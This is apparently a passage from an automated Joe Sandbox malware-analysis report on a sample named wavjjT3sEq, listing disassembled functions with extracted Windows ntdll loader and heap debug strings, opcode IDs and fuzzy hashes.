                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                              • Opcode ID: 30c2d0a1fee0b3ae899286694827339631d281df377c0baa0a02da81d769411a
                                                                                                                                                              • Instruction ID: f750f8e07f7a5c527360f8a2d74ef8b70bc2f45a1209f765b34d6415ec70bb25
                                                                                                                                                              • Opcode Fuzzy Hash: 30c2d0a1fee0b3ae899286694827339631d281df377c0baa0a02da81d769411a
                                                                                                                                                              • Instruction Fuzzy Hash: 8712BD36600646DFD725CF29C481BBABBF6FF09715F08C869E58A8B652D734E881CB50
                                                                                                                                                              Function 0193AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                              • API String ID: 0-3197712848
                                                                                                                                                              • Opcode ID: 0a6eeabe39ba47fefb0baeb69dd104837500ef97b5e8d1bd831fccbb189a7854
                                                                                                                                                              • Instruction ID: 50aa5c9b5db3d59824fbe91f2b6328319554ac6eb76ca02db86ed22a5686ad16
                                                                                                                                                              • Opcode Fuzzy Hash: 0a6eeabe39ba47fefb0baeb69dd104837500ef97b5e8d1bd831fccbb189a7854
                                                                                                                                                              • Instruction Fuzzy Hash: 7712CE71A093428BD325DF28C480BAAB7E9BFC4714F44091DE9CEDB291E774D945CBA2
                                                                                                                                                              Function 0191D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                              • Opcode ID: 34eafada8ddcf98b037050761b410153c487bba6b9e6057ffc484bd012f7414c
                                                                                                                                                              • Instruction ID: ebda3a0c66130e50796245b43ee706598054a849aba41e3632195e38cf965844
                                                                                                                                                              • Opcode Fuzzy Hash: 34eafada8ddcf98b037050761b410153c487bba6b9e6057ffc484bd012f7414c
                                                                                                                                                              • Instruction Fuzzy Hash: 13B19A7250835A9FD721CF68C484A6FBBE8BF88754F05492EF98DD7244D730D9888B92
                                                                                                                                                              Function 019D0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                              • API String ID: 0-1357697941
                                                                                                                                                              • Opcode ID: d23c4e8fe3872e5d5eb83495507a9f75ad7645aba775436c0c40dd366a6dd7a9
                                                                                                                                                              • Instruction ID: aab73d6fff50ecb408803f7b195947e46e6f24d6471371a3c4f558e0ce8ac503
                                                                                                                                                              • Opcode Fuzzy Hash: d23c4e8fe3872e5d5eb83495507a9f75ad7645aba775436c0c40dd366a6dd7a9
                                                                                                                                                              • Instruction Fuzzy Hash: 99F1F736A00646EFDB25DF6CC480BAABBF9FF09714F08C459E58A97242C774A985CB50
                                                                                                                                                              Function 019D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                              • Opcode ID: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                                                                                              • Instruction ID: bcfe491c1257f3a6419ce5cc78e787da3aa8c03a3ddf44fb51f41e1148a0ce04
                                                                                                                                                              • Opcode Fuzzy Hash: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                                                                                              • Instruction Fuzzy Hash: 04D1ED39600686DFDB22DFA8C440AADBFF6FF89714F08C059F94A9B252C7349981CB10
                                                                                                                                                              Function 019A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 019A8B8F
                                                                                                                                                              • VerifierDebug, xrefs: 019A8CA5
                                                                                                                                                              • VerifierDlls, xrefs: 019A8CBD
                                                                                                                                                              • HandleTraces, xrefs: 019A8C8F
                                                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019A8A3D
                                                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019A8A67
                                                                                                                                                              • VerifierFlags, xrefs: 019A8C50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                              • API String ID: 0-3223716464
                                                                                                                                                              • Opcode ID: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                                                                                              • Instruction ID: d8f0e35b5a0802e3fe6077dacaf4142f5d143f16e63dc8681cd8ce830b981e68
                                                                                                                                                              • Opcode Fuzzy Hash: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                                                                                              • Instruction Fuzzy Hash: B4912472A41316AFD322EF688890F5B77B8EBD5B15F850818FA4D6B240C770AC09CBD5
                                                                                                                                                              Function 0192EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                              • API String ID: 0-1109411897
                                                                                                                                                              • Opcode ID: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                                                                                              • Instruction ID: d62441c44071e3a3cbcbe6e4a549ed5ea10883060a8ef0f46c652d7b3583d78b
                                                                                                                                                              • Opcode Fuzzy Hash: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                                                                                              • Instruction Fuzzy Hash: 83A25A74A0562A8FDB64DF28CD98BADBBB5BF45705F2442E9D90DA7254DB309E80CF00
                                                                                                                                                              Function 0191F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                              • Opcode ID: 5650da20159c30cca575b66678c8bf5e199de8357ec6f71d2deb959d8f6c829a
                                                                                                                                                              • Instruction ID: 4d6b6817ad98b4bacdc5ffe09a38d8b272eeb85d7686aee7ecbcf50838940cc7
                                                                                                                                                              • Opcode Fuzzy Hash: 5650da20159c30cca575b66678c8bf5e199de8357ec6f71d2deb959d8f6c829a
                                                                                                                                                              • Instruction Fuzzy Hash: 1A42F13520838A8FD715DF28C484A6ABBE5FF88704F18496DE48ECB355D734D98ACB52
                                                                                                                                                              Function 0192ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                              • API String ID: 0-4098886588
                                                                                                                                                              • Opcode ID: ddd3b9f59f6dddaf81a4ac6554d4518eebafe6c19f34745b8671804b3e4a7fc9
                                                                                                                                                              • Instruction ID: 5e9a6ead46eea852c7b2715b433fb6072a58ad97005191ab35aeb36c7920c1c0
                                                                                                                                                              • Opcode Fuzzy Hash: ddd3b9f59f6dddaf81a4ac6554d4518eebafe6c19f34745b8671804b3e4a7fc9
                                                                                                                                                              • Instruction Fuzzy Hash: 4F32AF719002798BEB22CB18C894BEEBBF9BF45740F1441EAE94EA7255D7359F818F40
                                                                                                                                                              Function 0193B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                                              • Opcode ID: 99d75aea97bc72bdebff265e567aa94ad4d47e971cb933205fa10f6f9b3ca3ac
                                                                                                                                                              • Instruction ID: 727e80cefedf3e5da4ca15fc5aa19ee01b32a3aa8e02214929e9f19bef0608c3
                                                                                                                                                              • Opcode Fuzzy Hash: 99d75aea97bc72bdebff265e567aa94ad4d47e971cb933205fa10f6f9b3ca3ac
                                                                                                                                                              • Instruction Fuzzy Hash: 79C13931A00216ABDB25DB68C884BBEBBA9AFD5710F14416DED0FEB291D774CD44C3A1
                                                                                                                                                              Function 019563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                              • Opcode ID: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                                                                                              • Instruction ID: 39ba4bbf45e16e386c47d5a913cacb0be207af00f9f3897c9a16b70942305133
                                                                                                                                                              • Opcode Fuzzy Hash: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                                                                                              • Instruction Fuzzy Hash: F7913470B003169BEF36DF18D944BAE7BA9BF91B25F500168E90CBB285D7B49843C791
                                                                                                                                                              Function 00121150 Relevance: 7.7, Strings: 6, Instructions: 235COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: VUUU$Z0}h$u$y$z:b~$-
                                                                                                                                                              • API String ID: 0-3284785209
                                                                                                                                                              • Opcode ID: d4ddfa6fa118a3f8a30ce4e81a0c38c68ffe46c7adcd93ba6a9ec083af88ae56
                                                                                                                                                              • Instruction ID: dad59245f53fe66d559b1dc9b9ccd27aa1d10540da2a404adf5aceff40e44855
                                                                                                                                                              • Opcode Fuzzy Hash: d4ddfa6fa118a3f8a30ce4e81a0c38c68ffe46c7adcd93ba6a9ec083af88ae56
                                                                                                                                                              • Instruction Fuzzy Hash: EB81B271D0062A97DF28CE99D8401AEF7B1EFA4310F54872AD959AF780E774AE548BC0
                                                                                                                                                              Function 0191645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01979A2A
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01979A11, 01979A3A
                                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01979A01
                                                                                                                                                              • LdrpInitShimEngine, xrefs: 019799F4, 01979A07, 01979A30
                                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019799ED
                                                                                                                                                              • apphelp.dll, xrefs: 01916496
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-204845295
                                                                                                                                                              • Opcode ID: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                                                                                              • Instruction ID: 73cfb89cca0dad7e0be358aae39222391d1547f827cfb4d3b07e31ebed31053e
                                                                                                                                                              • Opcode Fuzzy Hash: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                                                                                              • Instruction Fuzzy Hash: 8451CE716083099FE725EF24C881EAB77E8FFC4758F00091DE589972A4DA70E984CB92
                                                                                                                                                              Function 0195C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01998181, 019981F5
                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01998170
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0195C6C3
                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01998177, 019981EB
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 0195C6C4
                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 019981E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                              • Opcode ID: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                                                                                              • Instruction ID: 4b0ea49e231d2ac0249253796e71f977fc60fb051037c9785267ccda51ef8478
                                                                                                                                                              • Opcode Fuzzy Hash: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                                                                                              • Instruction Fuzzy Hash: A131F2B16443069FD724EF28DC46E2A7798FFD5B10F04055CF98DAB291E660ED05C7A2
                                                                                                                                                              Function 01952674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019921BF
                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01992160, 0199219A, 019921BA
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01992165
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01992178
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01992180
                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0199219F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                              • Opcode ID: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                                                                                              • Instruction ID: 4e4dfbd1684bcfbfd2f779d164df1a308044d61face4a9bda5167790122ca553
                                                                                                                                                              • Opcode Fuzzy Hash: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                                                                                              • Instruction Fuzzy Hash: A731C876A41215BBEB22DBD98C85F6A7B7CEBA5A51F054059FF0C77140D370AA00C7A1
                                                                                                                                                              Function 01939950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                              • API String ID: 0-3393094623
                                                                                                                                                              • Opcode ID: 0721d4a266ebef90d807665f5574b9c76e72039cdbbe43d4b55407250e33d4f2
                                                                                                                                                              • Instruction ID: 2f46191aabc804291008937b81791a3817983a3a4044c7ea05049041517553ac
                                                                                                                                                              • Opcode Fuzzy Hash: 0721d4a266ebef90d807665f5574b9c76e72039cdbbe43d4b55407250e33d4f2
                                                                                                                                                              • Instruction Fuzzy Hash: 52025C719083418FD725DF68C084B6BBBE9BFC9748F54891EE99D87250D7B0D844CBA2
                                                                                                                                                              Function 0196096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 01962DF0: LdrInitializeThunk.NTDLL ref: 01962DFA
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BA3
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BB6
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D60
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404860816-0
                                                                                                                                                              • Opcode ID: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                                                                                              • Instruction ID: c7bf07c1fccbef7a43a73a65302aac0067a78d93559ea7956074b62a72e34581
                                                                                                                                                              • Opcode Fuzzy Hash: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                                                                                              • Instruction Fuzzy Hash: AB423A75900715DFDB21CF68C880BAAB7F9FF44314F1445AAE98DAB241E770AA84CF61
                                                                                                                                                              Function 019A4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                              • API String ID: 0-2518169356
                                                                                                                                                              • Opcode ID: 932f4e0fa5ddc965e43b718ac527ba216fcbd3f051d5a845c613b0d891172d61
                                                                                                                                                              • Instruction ID: fac73c48e017d9d51a954e7dbe20793dd332db48ebdba9fd9f72b5895b39c2b6
                                                                                                                                                              • Opcode Fuzzy Hash: 932f4e0fa5ddc965e43b718ac527ba216fcbd3f051d5a845c613b0d891172d61
                                                                                                                                                              • Instruction Fuzzy Hash: CE91A276A006299BDB21CF5CC880ABEB7B8FF48310F9A4169E919E7350D775DA05CBD0
                                                                                                                                                              Function 019370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                              • Opcode ID: 38ac1d53e0597c69cd8b66c38bce5cb2226eedc0c88fa816add915307d639e09
                                                                                                                                                              • Instruction ID: 7f0a2f4f1088499278240fa2c6fbcbbf5d112a200ef09c41beb3583f441fa035
                                                                                                                                                              • Opcode Fuzzy Hash: 38ac1d53e0597c69cd8b66c38bce5cb2226eedc0c88fa816add915307d639e09
                                                                                                                                                              • Instruction Fuzzy Hash: E613D270A00256DFDB29CF68C484BA9BBF5FF89304F148699E94DAB381D734A945CF90
                                                                                                                                                              Function 0193A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01987D39
                                                                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01987D03
                                                                                                                                                              • SsHd, xrefs: 0193A885
                                                                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01987D56
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                              • API String ID: 0-2905229100
